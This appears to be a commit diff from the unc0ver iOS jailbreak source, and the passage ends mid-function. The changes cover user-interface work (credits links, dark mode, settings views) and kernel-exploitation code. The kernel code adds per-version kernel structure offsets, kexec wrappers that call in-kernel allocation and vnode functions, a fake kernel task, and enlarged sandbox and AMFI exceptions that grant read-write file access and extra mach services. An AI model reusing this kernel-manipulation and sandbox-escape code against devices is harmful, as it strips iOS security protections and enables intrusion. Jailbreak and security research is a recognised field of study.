         return [NSURL URLWithString:[NSString stringWithFormat:@"tweetbot:///user_profile/%@", userName]];
@@ -110,26 +165,14 @@
     [[UIApplication sharedApplication] openURL:[CreditsTableViewController getURLForUserName:@"Jakeashacks"] options:@{} completionHandler:nil];
 }
 
--(IBAction)tappedOnJonathanSeals:(id)sender{
-    [[UIApplication sharedApplication] openURL:[CreditsTableViewController getURLForUserName:@"JonathanSeals"] options:@{} completionHandler:nil];
-}
-
 -(IBAction)tappedOnSaurik:(id)sender{
     [[UIApplication sharedApplication] openURL:[CreditsTableViewController getURLForUserName:@"saurik"] options:@{} completionHandler:nil];
 }
 
--(IBAction)tappedOnTihmstar:(id)sender{
-    [[UIApplication sharedApplication] openURL:[CreditsTableViewController getURLForUserName:@"tihmstar"] options:@{} completionHandler:nil];
-}
-
 -(IBAction)tappedOnSiguza:(id)sender{
     [[UIApplication sharedApplication] openURL:[CreditsTableViewController getURLForUserName:@"s1guza"] options:@{} completionHandler:nil];
 }
 
--(IBAction)tappedOnS0rryMyBad:(id)sender{
-    [[UIApplication sharedApplication] openURL:[CreditsTableViewController getURLForUserName:@"S0rryMyBad"] options:@{} completionHandler:nil];
-}
-
 -(IBAction)tappedOnExternalist:(id)sender{
     [[UIApplication sharedApplication] openURL:[CreditsTableViewController getURLForUserName:@"Externalist"] options:@{} completionHandler:nil];
 }
@@ -154,22 +197,18 @@
     [[UIApplication sharedApplication] openURL:[CreditsTableViewController getURLForUserName:@"MiscMisty"] options:@{} completionHandler:nil];
 }
 
--(IBAction)tappedOnSemaphore:(id)sender{
-    [[UIApplication sharedApplication] openURL:[CreditsTableViewController getURLForUserName:@"notcom"] options:@{} completionHandler:nil];
-}
-
--(IBAction)tappedOnPimskeks:(id)sender{
-    [[UIApplication sharedApplication] openURL:[CreditsTableViewController getURLForUserName:@"pimskeks"] options:@{} completionHandler:nil];
-}
-
--(IBAction)tappedOnLibimobiledevice:(id)sender{
-    [[UIApplication sharedApplication] openURL:[NSURL URLWithString:@"https://github.com/libimobiledevice"] options:@{} completionHandler:nil];
-}
-
 -(IBAction)tappedOnBen:(id)sender{
     [[UIApplication sharedApplication] openURL:[CreditsTableViewController getURLForUserName:@"benjweaverdev"] options:@{} completionHandler:nil];
 }
 
+- (IBAction)tappedOnSamG:(id)sender{
+    [[UIApplication sharedApplication] openURL:[NSURL URLWithString:@"https://reddit.com/u/Samg_is_a_Ninja"] options:@{} completionHandler:nil];
+}
+
+- (IBAction)tappedOnDennis:(id)sender{
+    [[UIApplication sharedApplication] openURL:[CreditsTableViewController getURLForUserName:@"DennisBednarz"] options:@{} completionHandler:nil];
+}
+
 - (CGFloat)tableView:(UITableView *)tableView heightForRowAtIndexPath:(NSIndexPath *)indexPath {
     return 44;
 }

Undecimus/source/FakeApt.h

@@ -14,7 +14,7 @@ NSDictionary *parseDependsOrProvides(NSString *string);
 BOOL compareDpkgVersion(NSString *version1, NSString *op, NSString *version2, BOOL *result);
 NSString *versionOfPkg(NSString *pkg);
 NSArray *resolveDepsForPkg(NSString * _Nonnull pkg, BOOL noPreDeps);
-BOOL extractDebsForPkg(NSString *pkg, NSMutableArray *installed, BOOL preDeps);
+BOOL extractDebsForPkg(NSString *pkg, NSMutableArray *installed, BOOL preDeps, bool doInject);
 NSDictionary *getPkgs(void);
 NSString *debForPkg(NSString *pkg);
 NSArray <NSString*> *debsForPkgs(NSArray <NSString*> *pkgs);

Undecimus/source/FakeApt.m

@@ -324,7 +324,7 @@ NSArray *resolveDepsForPkg(NSString *pkg, BOOL preDeps) {
     return resolveDepsForPkgWithQueue(pkg, nil, preDeps);
 }
 
-BOOL extractDebsForPkg(NSString *pkg, NSMutableArray *installed, BOOL preDeps) {
+BOOL extractDebsForPkg(NSString *pkg, NSMutableArray *installed, BOOL preDeps, bool doInject) {
     NSArray *pkgsForPkg = resolveDepsForPkg(pkg, preDeps);
     if (pkgsForPkg == nil || pkgsForPkg.count < 1) {
         LOG("Found no pkgs to install for \"%@\"", pkg);
@@ -342,7 +342,7 @@ BOOL extractDebsForPkg(NSString *pkg, NSMutableArray *installed, BOOL preDeps) {
         // Already installed all these
         return YES;
     }
-    if (!extractDebs(debsForPkg)) {
+    if (!extractDebs(debsForPkg, doInject)) {
         LOG("Failed to extract debs for \"%@\"", pkg);
         return NO;
     }

Undecimus/source/JailbreakViewController.h

@@ -31,23 +31,60 @@ while (false)
 
 #define notice(msg, wait, destructive) showAlert(@"Notice", msg, wait, destructive)
 
-#define status(msg, btnenbld, tbenbld) do { \
-    LOG("Status: %@", msg); \
+#define status(msg, btnenbld, nvbenbld) do { \
     dispatch_async(dispatch_get_main_queue(), ^{ \
+        if ([[[[[JailbreakViewController sharedController] goButton] titleLabel] text] isEqualToString:msg]) return; \
+        LOG("Status: %@", msg); \
         [UIView performWithoutAnimation:^{ \
             [[[JailbreakViewController sharedController] goButton] setEnabled:btnenbld]; \
-            [[[[JailbreakViewController sharedController] tabBarController] tabBar] setUserInteractionEnabled:tbenbld]; \
+            [[[JailbreakViewController sharedController] settingsButton] setUserInteractionEnabled:nvbenbld]; \
             [[[JailbreakViewController sharedController] goButton] setTitle:msg forState: btnenbld ? UIControlStateNormal : UIControlStateDisabled]; \
             [[[JailbreakViewController sharedController] goButton] layoutIfNeeded]; \
         }]; \
     }); \
 } while (false)
 
+#define progress(x) do { \
+    dispatch_async(dispatch_get_main_queue(), ^{ \
+        if ([[[[JailbreakViewController sharedController] exploitMessageLabel] text] isEqualToString:x]) return; \
+        LOG("Progress: %@", x); \
+        [[[JailbreakViewController sharedController] exploitMessageLabel] setText:x]; \
+    }); \
+} while (false)
+
 @interface JailbreakViewController : UIViewController
 @property (weak, nonatomic) IBOutlet UIButton *goButton;
 @property (weak, nonatomic) IBOutlet UITextView *outputView;
+@property (weak, nonatomic) IBOutlet UIButton *darkModeButton;
+@property (weak, nonatomic) IBOutlet UIButton *settingsButton;
+@property (weak, nonatomic) IBOutlet UIButton *mainDevsButton;
+
+@property (weak, nonatomic) IBOutlet UILabel *exploitProgressLabel;
+@property (weak, nonatomic) IBOutlet UILabel *exploitMessageLabel;
+@property (weak, nonatomic) IBOutlet UILabel *u0Label;
+@property (weak, nonatomic) IBOutlet UILabel *uOVersionLabel;
+
+@property (weak, nonatomic) IBOutlet UIProgressView *jailbreakProgressBar;
+
+@property (weak, nonatomic) IBOutlet UIView *mainView;
+@property (weak, nonatomic) IBOutlet UIView *creditsView;
+@property (weak, nonatomic) IBOutlet UIView *settingsView;
+@property (weak, nonatomic) IBOutlet UIView *mainDevView;
+@property (weak, nonatomic) IBOutlet UIView *backgroundView;
+
+@property (weak, nonatomic) IBOutlet UINavigationBar *settingsNavBar;
+@property (weak, nonatomic) IBOutlet UINavigationBar *creditsNavBar;
+
+@property (weak, nonatomic) IBOutlet UILabel *jailbreakLabel;
+@property (weak, nonatomic) IBOutlet UILabel *byLabel;
+@property (weak, nonatomic) IBOutlet UILabel *uncoverLabel;
+@property (weak, nonatomic) IBOutlet UILabel *supportedOSLabel;
+@property (weak, nonatomic) IBOutlet UILabel *UIByLabel;
+@property (weak, nonatomic) IBOutlet UILabel *firstAndLabel;
+@property (weak, nonatomic) IBOutlet UILabel *fourthAndLabel;
+
+
 @property (readonly) JailbreakViewController *sharedController;
-@property (weak, nonatomic) IBOutlet NSLayoutConstraint *goButtonSpacing;
 @property (assign) BOOL canExit;
 
 double uptime(void);
@@ -57,6 +94,7 @@ NSString *hexFromInt(NSInteger val);
 - (IBAction)tappedOnJailbreak:(id)sender;
 +(JailbreakViewController*)sharedController;
 - (void)appendTextToOutput:(NSString*)text;
+- (void)updateStatus;
 
 @end
 
@@ -75,6 +113,9 @@ static inline UIProgressHUD *addProgressHUD() {
 }
 
 static inline void removeProgressHUD(UIProgressHUD *hud) {
+    if (hud == nil) {
+        return;
+    }
     dispatch_semaphore_t semaphore = dispatch_semaphore_create(0);
     dispatch_async(dispatch_get_main_queue(), ^{
         [hud hide];
@@ -85,6 +126,9 @@ static inline void removeProgressHUD(UIProgressHUD *hud) {
 }
 
 static inline void updateProgressHUD(UIProgressHUD *hud, NSString *msg) {
+    if (hud == nil) {
+        return;
+    }
     dispatch_semaphore_t semaphore = dispatch_semaphore_create(0);
     dispatch_async(dispatch_get_main_queue(), ^{
         [hud setText:msg];

Undecimus/source/JailbreakViewController.m

@@ -23,10 +23,14 @@
 static JailbreakViewController *sharedController = nil;
 static NSMutableString *output = nil;
 static NSString *bundledResources = nil;
+extern int maxStage;
 
 - (IBAction)tappedOnJailbreak:(id)sender
 {
-    status(localize(@"Jailbreak"), false, false);
+    [self.exploitMessageLabel setAlpha:1];
+    [self.exploitProgressLabel setAlpha:1];
+    [self.jailbreakProgressBar setAlpha:1];
+    
     void (^const block)(void) = ^(void) {
         _assert(bundledResources != nil, localize(@"Bundled Resources version missing."), true);
         if (!jailbreakSupported()) {
@@ -38,32 +42,67 @@ static NSString *bundledResources = nil;
     dispatch_async(dispatch_get_global_queue(DISPATCH_QUEUE_PRIORITY_HIGH, 0ul), block);
 }
 
-- (void)viewWillAppear:(BOOL)animated {
-    [super viewWillAppear:animated];
+- (void)updateStatus {
     prefs_t *prefs = copy_prefs();
+    
     if (!jailbreakSupported()) {
         status(localize(@"Unsupported"), false, true);
+        progress(localize(@"Unsupported"));
     } else if (prefs->restore_rootfs) {
         status(localize(@"Restore RootFS"), true, true);
+        progress(localize(@"Ready to restore RootFS"));
     } else if (jailbreakEnabled()) {
         status(localize(@"Re-Jailbreak"), true, true);
+        progress(localize(@"Ready to re-jailbreak"));
     } else {
         status(localize(@"Jailbreak"), true, true);
+        progress(localize(@"Ready to jailbreak"));
     }
+    
     release_prefs(&prefs);
 }
 
+- (void)viewWillAppear:(BOOL)animated {
+    [super viewWillAppear:animated];
+    
+    [self.jailbreakProgressBar setProgress:0];
+    [self.jailbreakProgressBar setTransform:CGAffineTransformScale(CGAffineTransformIdentity, 1, 2)];
+    
+    [self.settingsView setTransform:CGAffineTransformScale(CGAffineTransformIdentity, 0.7, 0.7)];
+    [self.settingsView setAlpha:0];
+    [self.mainDevView setTransform:CGAffineTransformScale(CGAffineTransformIdentity, 0.7, 0.7)];
+    [self.mainDevView setAlpha:0];
+    [self.creditsView setTransform:CGAffineTransformScale(CGAffineTransformIdentity, 0.7, 0.7)];
+    [self.creditsView setAlpha:0];
+}
+
 - (void)viewDidLoad {
     [super viewDidLoad];
     _canExit = YES;
     // Do any additional setup after loading the view, typically from a nib.
     prefs_t *prefs = copy_prefs();
+    
     if (prefs->hide_log_window) {
         _outputView.hidden = YES;
         _outputView = nil;
-        _goButtonSpacing.constant += 80;
     }
+    
+    if (prefs->dark_mode) {
+        [self darkMode];
+    } else {
+        [self lightMode];
+    }
+    
     release_prefs(&prefs);
+    
+    [self.settingsNavBar setBackgroundImage:[UIImage new] forBarMetrics:UIBarMetricsDefault];
+    [self.settingsNavBar setShadowImage:[UIImage new]];
+    [self.creditsNavBar setBackgroundImage:[UIImage new] forBarMetrics:UIBarMetricsDefault];
+    [self.creditsNavBar setShadowImage:[UIImage new]];
+    [[NSNotificationCenter defaultCenter] addObserver:self selector:@selector(showSpeicalThanks:) name:@"showSpecialThanks" object:nil];
+    [self.exploitProgressLabel setText:[NSString stringWithFormat:@"%d/%d", 0, maxStage]];
+    [self.uOVersionLabel setText:[NSString stringWithFormat:@"unc0ver Version: %@", appVersion()]];
+    
     sharedController = self;
     bundledResources = bundledResourcesVersion();
     LOG("unc0ver Version: %@", appVersion());
@@ -76,30 +115,145 @@ static NSString *bundledResources = nil;
     }
 }
 
+- (void)darkMode {
+    [[NSNotificationCenter defaultCenter] postNotificationName:@"darkModeSettings" object:self];
+    [[NSNotificationCenter defaultCenter] postNotificationName:@"darkModeCredits" object:self];
+    
+    [self.darkModeButton setImage:[UIImage imageNamed:@"DarkMode-Dark"] forState:UIControlStateNormal];
+    [self.settingsButton setImage:[UIImage imageNamed:@"Settings-Dark"] forState:UIControlStateNormal];
+    [self.exploitProgressLabel setTextColor:[UIColor whiteColor]];
+    [self.exploitMessageLabel setTextColor:[UIColor whiteColor]];
+    [self.u0Label setTextColor:[UIColor whiteColor]];
+    [self.uOVersionLabel setTextColor:[UIColor whiteColor]];
+    [self.jailbreakLabel setTextColor:[UIColor whiteColor]];
+    [self.byLabel setTextColor:[UIColor whiteColor]];
+    [self.UIByLabel setTextColor:[UIColor whiteColor]];
+    [self.firstAndLabel setTextColor:[UIColor whiteColor]];
+    [self.uncoverLabel setTextColor:[UIColor whiteColor]];
+    [self.supportedOSLabel setTextColor:[UIColor whiteColor]];
+    [self.fourthAndLabel setTextColor:[UIColor whiteColor]];
+    [self.outputView setTextColor:[UIColor whiteColor]];
+    [self.backgroundView setBackgroundColor:[UIColor colorWithRed:10.0f/255.0f green:13.0f/255.0f blue:17.0f/255.0f alpha:0.97f]];
+    [self.mainDevsButton setTitleColor:[UIColor whiteColor] forState:normal];
+    [self.settingsNavBar setTintColor:[UIColor whiteColor]];
+    [self.settingsNavBar setTitleTextAttributes:@{NSForegroundColorAttributeName:[UIColor whiteColor]}];
+    [self.settingsNavBar setLargeTitleTextAttributes:@{NSForegroundColorAttributeName:[UIColor whiteColor]}];
+    [self.creditsNavBar setTintColor:[UIColor whiteColor]];
+    [self.creditsNavBar setTitleTextAttributes:@{NSForegroundColorAttributeName:[UIColor whiteColor]}];
+    [self.creditsNavBar setLargeTitleTextAttributes:@{NSForegroundColorAttributeName:[UIColor whiteColor]}];
+    self.jailbreakProgressBar.trackTintColor = [UIColor blackColor];
+    [self setNeedsStatusBarAppearanceUpdate];
+}
+
+- (void)lightMode {
+    [[NSNotificationCenter defaultCenter] postNotificationName:@"lightModeSettings" object:self];
+    [[NSNotificationCenter defaultCenter] postNotificationName:@"lightModeCredits" object:self];
+    
+    [self.darkModeButton setImage:[UIImage imageNamed:@"DarkMode-Light"] forState:UIControlStateNormal];
+    [self.settingsButton setImage:[UIImage imageNamed:@"Settings-Light"] forState:UIControlStateNormal];
+    [self.exploitProgressLabel setTextColor:[UIColor blackColor]];
+    [self.exploitMessageLabel setTextColor:[UIColor blackColor]];
+    [self.u0Label setTextColor:[UIColor blackColor]];
+    [self.jailbreakLabel setTextColor:[UIColor blackColor]];
+    [self.byLabel setTextColor:[UIColor blackColor]];
+    [self.UIByLabel setTextColor:[UIColor blackColor]];
+    [self.firstAndLabel setTextColor:[UIColor blackColor]];
+    [self.fourthAndLabel setTextColor:[UIColor blackColor]];
+    [self.uncoverLabel setTextColor:[UIColor blackColor]];
+    [self.supportedOSLabel setTextColor:[UIColor blackColor]];
+    [self.uOVersionLabel setTextColor:[UIColor blackColor]];
+    [self.outputView setTextColor:[UIColor blackColor]];
+    [self.backgroundView setBackgroundColor:[UIColor.whiteColor colorWithAlphaComponent:0.84]];
+    [self.settingsNavBar setTintColor:[UIColor blackColor]];
+    [self.settingsNavBar setTitleTextAttributes:@{NSForegroundColorAttributeName:[UIColor blackColor]}];
+    [self.settingsNavBar setLargeTitleTextAttributes:@{NSForegroundColorAttributeName:[UIColor blackColor]}];
+    [self.creditsNavBar setTintColor:[UIColor blackColor]];
+    [self.creditsNavBar setTitleTextAttributes:@{NSForegroundColorAttributeName:[UIColor blackColor]}];
+    [self.creditsNavBar setLargeTitleTextAttributes:@{NSForegroundColorAttributeName:[UIColor blackColor]}];
+    self.jailbreakProgressBar.trackTintColor = [UIColor lightGrayColor]; 
+    [self setNeedsStatusBarAppearanceUpdate];
+}
+
+- (IBAction)enableDarkMode:(id)sender {
+    prefs_t *prefs = copy_prefs();
+    prefs->dark_mode = !prefs->dark_mode;
+    set_prefs(prefs);
+    [UIView animateWithDuration:0.5 delay:0 usingSpringWithDamping:1 initialSpringVelocity:1 options:UIViewAnimationOptionCurveEaseInOut animations:^{
+        if (prefs->dark_mode) {
+            [self darkMode];
+        } else {
+            [self lightMode];
+        }
+    } completion:nil];
+    release_prefs(&prefs);
+}
+
 - (void)didReceiveMemoryWarning {
     [super didReceiveMemoryWarning];
     // Dispose of any resources that can be recreated.
 }
 
 - (UIStatusBarStyle)preferredStatusBarStyle {
-    return UIStatusBarStyleDefault;
+    prefs_t *prefs = copy_prefs();
+    UIStatusBarStyle statusBarStyle = prefs->dark_mode ? UIStatusBarStyleLightContent : UIStatusBarStyleDefault;
+    release_prefs(&prefs);
+    return statusBarStyle;
+}
+
+- (IBAction)openSettings:(id)sender {
+    [UIView animateWithDuration:0.5 delay:0 usingSpringWithDamping:1 initialSpringVelocity:1 options:UIViewAnimationOptionCurveEaseInOut animations:^{
+        self.settingsView.transform = CGAffineTransformScale(CGAffineTransformIdentity, 1, 1);
+        self.settingsView.alpha = 1;
+        self.mainView.transform = CGAffineTransformScale(CGAffineTransformIdentity, 1.3, 1.3);
+        self.mainView.alpha = 0;
+    } completion:nil];
+}
+
+- (void) showSpeicalThanks:(NSNotification *) notification {
+    [UIView animateWithDuration:0.5 delay:0 usingSpringWithDamping:1 initialSpringVelocity:1 options:UIViewAnimationOptionCurveEaseInOut animations:^{
+        self.creditsView.transform = CGAffineTransformScale(CGAffineTransformIdentity, 1, 1);
+        self.creditsView.alpha = 1;
+        self.settingsView.transform = CGAffineTransformScale(CGAffineTransformIdentity, 1.3, 1.3);
+        self.settingsView.alpha = 0;
+    } completion:nil];
+}
+
+- (IBAction)dismissSpeicalThanks:(id)sender{
+    [UIView animateWithDuration:0.5 delay:0 usingSpringWithDamping:1 initialSpringVelocity:1 options:UIViewAnimationOptionCurveEaseInOut animations:^{
+        self.settingsView.transform = CGAffineTransformScale(CGAffineTransformIdentity, 1, 1);
+        self.settingsView.alpha = 1;
+        self.creditsView.transform = CGAffineTransformScale(CGAffineTransformIdentity, 0.7, 0.7);
+        self.creditsView.alpha = 0;
+    } completion:nil];
+}
+
+- (IBAction)closeSettings:(id)sender{
+    [UIView animateWithDuration:0.5 delay:0 usingSpringWithDamping:1 initialSpringVelocity:1 options:UIViewAnimationOptionCurveEaseInOut animations:^{
+        self.mainView.transform = CGAffineTransformScale(CGAffineTransformIdentity, 1, 1);
+        self.mainView.alpha = 1;
+        self.settingsView.transform = CGAffineTransformScale(CGAffineTransformIdentity, 0.7, 0.7);
+        self.settingsView.alpha = 0;
+    } completion:nil];
+    
+    [[NSNotificationCenter defaultCenter] postNotificationName:@"dismissKeyboard" object:self];
+
 }
 
 - (IBAction)tappedOnPwn:(id)sender{
     [[UIApplication sharedApplication] openURL:[CreditsTableViewController getURLForUserName:@"Pwn20wnd"] options:@{} completionHandler:nil];
 }
 
-- (IBAction)tappedOnDennis:(id)sender{
-    [[UIApplication sharedApplication] openURL:[CreditsTableViewController getURLForUserName:@"DennisBednarz"] options:@{} completionHandler:nil];
-}
-
 - (IBAction)tappedOnSamB:(id)sender{
     [[UIApplication sharedApplication] openURL:[CreditsTableViewController getURLForUserName:@"sbingner"] options:@{} completionHandler:nil];
 }
 
-- (IBAction)tappedOnSamG:(id)sender{
-    [[UIApplication sharedApplication] openURL:[NSURL URLWithString:@"https://reddit.com/u/Samg_is_a_Ninja"] options:@{} completionHandler:nil];
+- (IBAction)tappendOnJoonwoo:(id)sender{
+    [[UIApplication sharedApplication] openURL:[CreditsTableViewController getURLForUserName:@"iOS_App_Dev"] options:@{} completionHandler:nil];
 }
+- (IBAction)tappendOnUbik:(id)sender{
+    [[UIApplication sharedApplication] openURL:[CreditsTableViewController getURLForUserName:@"HiMyNameIsUbik"] options:@{} completionHandler:nil];
+}
+
 
 // This intentionally returns nil if called before it's been created by a proper init
 +(JailbreakViewController *)sharedController {

Undecimus/source/KernelOffsets.h

@@ -79,6 +79,7 @@ enum kernel_offset {
     KSTRUCT_OFFSET_HOST_SPECIAL,
     
     /* struct ucred */
+    KSTRUCT_OFFSET_UCRED_CR_REF,
     KSTRUCT_OFFSET_UCRED_CR_UID,
     KSTRUCT_OFFSET_UCRED_CR_RUID,
     KSTRUCT_OFFSET_UCRED_CR_SVUID,

Undecimus/source/KernelOffsets.m

@@ -74,6 +74,7 @@ uint32_t kernel_offsets_11_0[] = {
 
     0x10, // KSTRUCT_OFFSET_HOST_SPECIAL
     
+    0x10, // KSTRUCT_OFFSET_UCRED_CR_REF
     0x18, // KSTRUCT_OFFSET_UCRED_CR_UID
     0x1c, // KSTRUCT_OFFSET_UCRED_CR_RUID
     0x20, // KSTRUCT_OFFSET_UCRED_CR_SVUID
@@ -172,6 +173,7 @@ uint32_t kernel_offsets_11_3[] = {
 
     0x10, // KSTRUCT_OFFSET_HOST_SPECIAL
 
+    0x10, // KSTRUCT_OFFSET_UCRED_CR_REF
     0x18, // KSTRUCT_OFFSET_UCRED_CR_UID
     0x1c, // KSTRUCT_OFFSET_UCRED_CR_RUID
     0x20, // KSTRUCT_OFFSET_UCRED_CR_SVUID
@@ -249,7 +251,7 @@ uint32_t kernel_offsets_12_0[] = {
     0xa0, // KSTRUCT_OFFSET_IPC_PORT_IP_SRIGHTS
     
     0x60, // KSTRUCT_OFFSET_PROC_PID
-    0x108, // KSTRUCT_OFFSET_PROC_P_FD
+    0x100, // KSTRUCT_OFFSET_PROC_P_FD
     0x10, // KSTRUCT_OFFSET_PROC_TASK
     0xf8, // KSTRUCT_OFFSET_PROC_UCRED
     0x0, // KSTRUCT_OFFSET_PROC_P_LIST
@@ -286,6 +288,7 @@ uint32_t kernel_offsets_12_0[] = {
     
     0x10, // KSTRUCT_OFFSET_HOST_SPECIAL
     
+    0x10, // KSTRUCT_OFFSET_UCRED_CR_REF
     0x18, // KSTRUCT_OFFSET_UCRED_CR_UID
     0x1c, // KSTRUCT_OFFSET_UCRED_CR_RUID
     0x20, // KSTRUCT_OFFSET_UCRED_CR_SVUID

Undecimus/source/KernelUtilities.c

@@ -63,22 +63,29 @@ extern bool is_directory(const char *filename);
 #define VSHARED_DYLD 0x000200 /* vnode is a dyld shared cache file */
 
 #define FILE_READ_EXC_KEY "com.apple.security.exception.files.absolute-path.read-only"
+#define FILE_READ_WRITE_EXC_KEY "com.apple.security.exception.files.absolute-path.read-write"
 #define MACH_LOOKUP_EXC_KEY "com.apple.security.exception.mach-lookup.global-name"
 #define MACH_REGISTER_EXC_KEY "com.apple.security.exception.mach-register.global-name"
 
 static const char *file_read_exceptions[] = {
     "/Library",
-    "/private/var/mobile/Library",
-    "/System/Library/Caches",
+    "/System",
     "/private/var/mnt",
     NULL
 };
 
+static const char *file_read_write_exceptions[] = {
+    "/private/var/mobile/Library",
+    NULL
+};
+
 static const char *mach_lookup_exceptions[] = {
     "cy:com.saurik.substrated",
     "ch.ringwald.hidsupport.backboard",
     "com.rpetrich.rocketbootstrapd",
     "com.apple.BTLEAudioController.xpc",
+    "com.apple.backboard.hid.services",
+    "com.apple.commcenter.coretelephony.xpc",
     NULL
 };
 
@@ -503,13 +510,13 @@ kptr_t sstrdup(const char *str) {
     kptr_t const function = getoffset(sstrdup);
     _assert(KERN_POINTER_VALID(function));
     kstr_size = strlen(str) + 1;
-    kstr = kmem_alloc(kstr_size);
+    kstr = IOMalloc(kstr_size);
     _assert(KERN_POINTER_VALID(kstr));
     _assert(wkbuffer(kstr, (void *)str, kstr_size));
     ret = kexec(function, kstr, KPTR_NULL, KPTR_NULL, KPTR_NULL, KPTR_NULL, KPTR_NULL, KPTR_NULL);
     if (ret != KPTR_NULL) ret = zm_fix_addr(ret);
 out:;
-    if (kstr_size != 0 && KERN_POINTER_VALID(kstr)) kmem_free(kstr, kstr_size); kstr = KPTR_NULL;
+    SafeIOFreeNULL(kstr, kstr_size);
     return ret;
 }
 
@@ -531,6 +538,26 @@ void sfree(kptr_t ptr) {
 out:;
 }
 
+
+kptr_t IOMalloc(vm_size_t size) {
+    kptr_t ret = KPTR_NULL;
+    kptr_t const function = getoffset(IOMalloc);
+    _assert(KERN_POINTER_VALID(function));
+    ret = kexec(function, (kptr_t)size, KPTR_NULL, KPTR_NULL, KPTR_NULL, KPTR_NULL, KPTR_NULL, KPTR_NULL);
+    if (ret != KPTR_NULL) ret = zm_fix_addr(ret);
+out:;
+    return ret;
+}
+
+void IOFree(kptr_t address, vm_size_t size) {
+    _assert(KERN_POINTER_VALID(address));
+    _assert(size > 0);
+    kptr_t const function = getoffset(IOFree);
+    _assert(KERN_POINTER_VALID(function));
+    kexec(function, address, (kptr_t)size, KPTR_NULL, KPTR_NULL, KPTR_NULL, KPTR_NULL, KPTR_NULL);
+out:;
+}
+
 int extension_create_file(kptr_t saveto, kptr_t sb, const char *path, size_t path_len, uint32_t subtype) {
     int ret = -1;
     kptr_t kstr = KPTR_NULL;
@@ -777,6 +804,52 @@ out:;
     return ret;
 }
 
+int vnode_getfromfd(kptr_t ctx, int fd, kptr_t *vpp) {
+    int ret = -1;
+    size_t vpp_kptr_size = 0;
+    kptr_t vpp_kptr = KPTR_NULL;
+    _assert(KERN_POINTER_VALID(ctx));
+    _assert(fd > 0);
+    _assert(vpp != NULL);
+    kptr_t const function = getoffset(vnode_getfromfd);
+    _assert(KERN_POINTER_VALID(function));
+    vpp_kptr_size = sizeof(kptr_t);
+    vpp_kptr = smalloc(vpp_kptr_size);
+    _assert(KERN_POINTER_VALID(vpp_kptr));
+    ret = (int)kexec(function, ctx, (kptr_t)fd, vpp_kptr, KPTR_NULL, KPTR_NULL, KPTR_NULL, KPTR_NULL);
+    _assert(rkbuffer(vpp_kptr, vpp, vpp_kptr_size));
+out:;
+    SafeSFreeNULL(vpp_kptr);
+    return ret;
+}
+
+int vn_getpath(kptr_t vp, char *pathbuf, int *len) {
+    int ret = -1;
+    size_t pathbuf_kptr_size = 0;
+    kptr_t pathbuf_kptr = KPTR_NULL;
+    size_t len_kptr_size = 0;
+    kptr_t len_kptr = KPTR_NULL;
+    _assert(KERN_POINTER_VALID(vp));
+    _assert(pathbuf != NULL);
+    _assert(len != NULL);
+    kptr_t const function = getoffset(vn_getpath);
+    _assert(KERN_POINTER_VALID(function));
+    pathbuf_kptr_size = *len;
+    pathbuf_kptr = smalloc(pathbuf_kptr_size);
+    _assert(KERN_POINTER_VALID(pathbuf_kptr));
+    len_kptr_size = sizeof(*len);
+    len_kptr = smalloc(len_kptr_size);
+    _assert(KERN_POINTER_VALID(len_kptr));
+    _assert(wkbuffer(len_kptr, len, len_kptr_size));
+    ret = (int)kexec(function, vp, pathbuf_kptr, len_kptr, KPTR_NULL, KPTR_NULL, KPTR_NULL, KPTR_NULL);
+    _assert(rkbuffer(pathbuf_kptr, pathbuf, pathbuf_kptr_size));
+    _assert(rkbuffer(len_kptr, len, len_kptr_size));
+out:;
+    SafeSFreeNULL(pathbuf_kptr);
+    SafeSFreeNULL(len_kptr);
+    return ret;
+}
+
 int vnode_put(kptr_t vp) {
     int ret = -1;
     _assert(KERN_POINTER_VALID(vp));
@@ -1111,6 +1184,9 @@ bool set_sandbox_exceptions(kptr_t sandbox) {
     for (const char **exception = file_read_exceptions; *exception; exception++) {
         _assert(set_file_extension(sandbox, FILE_READ_EXC_KEY, *exception));
     }
+    for (const char **exception = file_read_write_exceptions; *exception; exception++) {
+        _assert(set_file_extension(sandbox, FILE_READ_WRITE_EXC_KEY, *exception));
+    }
     for (const char **exception = mach_lookup_exceptions; *exception; exception++) {
         _assert(set_mach_extension(sandbox, MACH_LOOKUP_EXC_KEY, *exception));
     }
@@ -1177,6 +1253,7 @@ bool set_exceptions(kptr_t sandbox, kptr_t amfi_entitlements) {
         _assert(set_sandbox_exceptions(sandbox));
         if (KERN_POINTER_VALID(amfi_entitlements)) {
             _assert(set_amfi_exceptions(amfi_entitlements, FILE_READ_EXC_KEY, file_read_exceptions, true));
+            _assert(set_amfi_exceptions(amfi_entitlements, FILE_READ_WRITE_EXC_KEY, file_read_write_exceptions, true));
             _assert(set_amfi_exceptions(amfi_entitlements, MACH_LOOKUP_EXC_KEY, mach_lookup_exceptions, false));
             _assert(set_amfi_exceptions(amfi_entitlements, MACH_REGISTER_EXC_KEY, mach_register_exceptions, false));
         }
@@ -1478,7 +1555,7 @@ kptr_t make_fake_task(kptr_t vm_map) {
     void *fake_task = NULL;
     _assert(KERN_POINTER_VALID(vm_map));
     fake_task_size = 0x1000;
-    fake_task_kaddr = kmem_alloc(fake_task_size);
+    fake_task_kaddr = IOMalloc(fake_task_size);
     _assert(KERN_POINTER_VALID(fake_task_kaddr));
     fake_task = malloc(fake_task_size);
     _assert(fake_task != NULL);
@@ -1490,7 +1567,7 @@ kptr_t make_fake_task(kptr_t vm_map) {
     _assert(wkbuffer(fake_task_kaddr, fake_task, fake_task_size));
     ret = fake_task_kaddr;
 out:;
-    if (!KERN_POINTER_VALID(ret) && KERN_POINTER_VALID(fake_task_kaddr)) kmem_free(fake_task_kaddr, fake_task_size); fake_task_kaddr = KPTR_NULL;
+    if (!KERN_POINTER_VALID(ret) && KERN_POINTER_VALID(fake_task_kaddr)) SafeIOFreeNULL(fake_task_kaddr, fake_task_size);
     SafeFreeNULL(fake_task);
     return ret;
 }
@@ -1579,21 +1656,59 @@ out:;
     return ret;
 }
 
+kptr_t get_vnode_for_fd(int fd) {
+    kptr_t ret = KPTR_NULL;
+    kptr_t *vpp = NULL;
+    _assert(fd > 0);
+    kptr_t const vfs_context = vfs_context_current();
+    _assert(KERN_POINTER_VALID(vfs_context));
+    vpp = malloc(sizeof(kptr_t));
+    _assert(vpp != NULL);
+    bzero(vpp, sizeof(kptr_t));
+    _assert(vnode_getfromfd(vfs_context, fd, vpp) == 0);
+    kptr_t const vnode = *vpp;
+    _assert(KERN_POINTER_VALID(vnode));
+    ret = vnode;
+out:;
+    SafeFreeNULL(vpp);
+    return ret;
+}
+
+char *get_path_for_fd(int fd) {
+    char *ret = NULL;
+    kptr_t vnode = KPTR_NULL;
+    int *len = NULL;
+    char *pathbuf = NULL;
